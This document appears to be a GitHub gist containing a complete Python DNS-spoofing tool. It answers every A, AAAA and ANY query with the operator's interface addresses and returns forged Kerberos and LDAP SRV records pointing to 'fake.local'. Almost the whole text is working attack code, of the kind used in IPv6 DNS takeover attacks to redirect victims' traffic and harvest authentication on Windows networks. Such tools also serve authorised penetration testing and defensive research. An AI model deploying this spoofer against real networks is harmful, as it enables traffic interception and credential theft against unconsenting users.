Skip to content

Instantly share code, notes, and snippets.

@FrankSpierings
Last active June 5, 2021 08:12
Show Gist options
  • Save FrankSpierings/7d8accbffd22df897dc4e33629f7f0d2 to your computer and use it in GitHub Desktop.
Save FrankSpierings/7d8accbffd22df897dc4e33629f7f0d2 to your computer and use it in GitHub Desktop.
DNS-Spoof.py (IPv6 and IPv4)
import socket
import threading
import socketserver
import time
from dnslib import *
import struct
import netifaces
import logging
import logging.config
import json
import argparse
# Logging configuration in the ``logging.config.dictConfig`` schema.
# Everything logged through the root logger goes to stdout via the
# "colored" formatter; the "standard" formatter is defined but not
# attached to any handler.
logconfig = {
    "version": 1,
    "disable_existing_loggers": False,
    "formatters": {
        "standard": {
            "format": "%(levelname)s:%(name)s:%(message)s",
        },
        "colored": {
            # "()" names the factory dictConfig instantiates for this
            # formatter (presumably requires the colorlog package to be
            # installed -- it is looked up by dotted name, not imported here).
            "()": "colorlog.ColoredFormatter",
            "format": "%(log_color)s%(asctime)s %(levelname)-8s%(reset)s %(blue)s%(message)s",
        },
    },
    "handlers": {
        "default": {
            "level": "DEBUG",
            "formatter": "colored",
            "class": "logging.StreamHandler",
            "stream": "ext://sys.stdout",
        },
    },
    "loggers": {
        # The empty name configures the root logger.
        "": {
            "handlers": ["default"],
            "level": "DEBUG",
            "propagate": True,
        },
    },
}
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
    """Answer a single DNS query received over a TCP connection.

    DNS over TCP prefixes every message with its length as a 2-byte
    big-endian integer; the same framing is applied to the reply.
    """

    def _recv_exact(self, count):
        """Read exactly ``count`` bytes from the connection.

        A single ``recv`` on a stream socket may return fewer bytes than
        requested, so keep reading until the full amount has arrived.

        Returns:
            The ``count`` bytes read, or ``None`` if the peer closed the
            connection before that many bytes arrived.
        """
        chunks = []
        remaining = count
        while remaining > 0:
            chunk = self.request.recv(remaining)
            if not chunk:
                # Empty read means the peer closed the connection.
                return None
            chunks.append(chunk)
            remaining -= len(chunk)
        return b''.join(chunks)

    def handle(self):
        """Read one length-prefixed query and send back the spoofed reply."""
        self.logger = logging.getLogger(self.__class__.__name__)

        header = self._recv_exact(2)
        if header is None:
            self.logger.debug('{0} Connection closed before a full query arrived'.format(self.client_address[0]))
            return
        size = struct.unpack('>H', header)[0]

        data = self._recv_exact(size)
        if data is None:
            self.logger.debug('{0} Connection closed before a full query arrived'.format(self.client_address[0]))
            return

        reply = dns_reply(self, data).pack()
        # Prepend the 2-byte length required by the TCP transport.
        self.request.sendall(struct.pack('>H', len(reply)) + reply)
class ThreadedUDPRequestHandler(socketserver.BaseRequestHandler):
    """Answer a single DNS query received as a UDP datagram."""

    def handle(self):
        """Build the spoofed reply for the datagram and send it to the sender."""
        self.logger = logging.getLogger(type(self).__name__)
        # For datagram servers ``self.request`` is a (payload, socket) pair.
        payload, sock = self.request
        response = dns_reply(self, payload)
        sock.sendto(response.pack(), self.client_address)
def dns_reply(self, data):
    """Build a spoofed DNS reply for a raw wire-format query.

    A and AAAA questions (and ANY, which gets both) are answered with the
    module-level ``ANSWER_A`` / ``ANSWER_AAAA`` addresses when those are not
    ``None``. SRV questions are always answered with the target
    ``fake.local``; the port is 88 for names starting with ``_kerberos``,
    389 for names starting with ``_ldap`` and 0 otherwise. Other query
    types produce a reply without answers.

    Args:
        self: The request handler serving the query; its ``logger`` and
            ``client_address`` attributes are used for logging.
        data: The raw DNS query bytes.

    Returns:
        The ``DNSRecord`` reply (not yet packed).
    """
    client = self.client_address[0]
    self.logger.debug('{0} Raw query:\n{1}'.format(client, data))
    query = DNSRecord.parse(data)
    self.logger.info('{0} Query:\n{1}'.format(client, query))
    reply = query.reply()

    for q in query.questions:
        name = str(q.qname)
        if q.qtype in (QTYPE.A, QTYPE.ANY) and ANSWER_A is not None:
            reply.add_answer(RR(name, QTYPE.A, rdata=A(ANSWER_A)))
        if q.qtype in (QTYPE.AAAA, QTYPE.ANY) and ANSWER_AAAA is not None:
            reply.add_answer(RR(name, QTYPE.AAAA, rdata=AAAA(ANSWER_AAAA)))
        if q.qtype == QTYPE.SRV:
            # DNS names compare case-insensitively, so match the service
            # label regardless of the case the client used.
            service = name.lower()
            if service.startswith('_kerberos'):
                port = 88
            elif service.startswith('_ldap'):
                port = 389
            else:
                port = 0
            reply.add_answer(RR(name, QTYPE.SRV, rdata=SRV(weight=1000, priority=0, port=port, target='fake.local')))

    self.logger.info('{0} Reply:\n{1}'.format(client, reply))
    return reply
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    """TCP server on an IPv6 socket that handles each connection in its own thread."""

    address_family = socket.AF_INET6
    # Must be a class attribute: the constructor binds the socket, so setting
    # it on an instance afterwards has no effect.
    allow_reuse_address = True
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
    """UDP server on an IPv6 socket that handles each datagram in its own thread."""

    address_family = socket.AF_INET6
    # Must be a class attribute: the constructor binds the socket, so setting
    # it on an instance afterwards has no effect.
    allow_reuse_address = True
if __name__ == "__main__":
    # Script entry point: start a TCP and a UDP DNS server on the requested
    # port and answer queries with the addresses of the given interface
    # until interrupted with CTRL+C.
    parser = argparse.ArgumentParser(description='Spoof DNS replies')
    parser.add_argument('interface', help='Interface to listen on')
    parser.add_argument('-p', dest='port', type=int, default=53, help='Port to listen on')
    args = parser.parse_args()

    logging.config.dictConfig(logconfig)
    logger = logging.getLogger()

    HOST = ""
    PORT = args.port

    # The server constructors bind immediately, so address reuse has to be
    # enabled on the classes before any instance is created.
    for server_class in (ThreadedTCPServer, ThreadedUDPServer):
        server_class.allow_reuse_address = True
    servers = [
        ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler),
        ThreadedUDPServer((HOST, PORT), ThreadedUDPRequestHandler),
    ]

    # Addresses handed out in spoofed replies; read by dns_reply() as module
    # globals. None means "do not answer this record type".
    ANSWER_A = None
    ANSWER_AAAA = None
    try:
        addresses = netifaces.ifaddresses(args.interface)
    except (ValueError, OSError) as exc:
        # Best effort: an unknown interface leaves both answers unset.
        logger.warning('Could not read addresses of %s: %s', args.interface, exc)
        addresses = {}
    try:
        ANSWER_A = addresses[netifaces.AF_INET][0]['addr']
    except (KeyError, IndexError):
        pass  # interface has no IPv4 address
    try:
        # Drop the "%scope" suffix from the address.
        ANSWER_AAAA = addresses[netifaces.AF_INET6][0]['addr'].split('%')[0]
    except (KeyError, IndexError):
        pass  # interface has no IPv6 address
    logger.info("Ipv4 Address: {0}".format(ANSWER_A))
    logger.info("Ipv6 Address: {0}".format(ANSWER_AAAA))

    for server in servers:
        server_thread = threading.Thread(target=server.serve_forever)
        # Daemon threads do not keep the process alive after the main thread exits.
        server_thread.daemon = True
        server_thread.start()

    logger.info('CTRL+C to end')
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        pass
    finally:
        for server in servers:
            server.shutdown()
            # Release the listening sockets as well as stopping the loops.
            server.server_close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment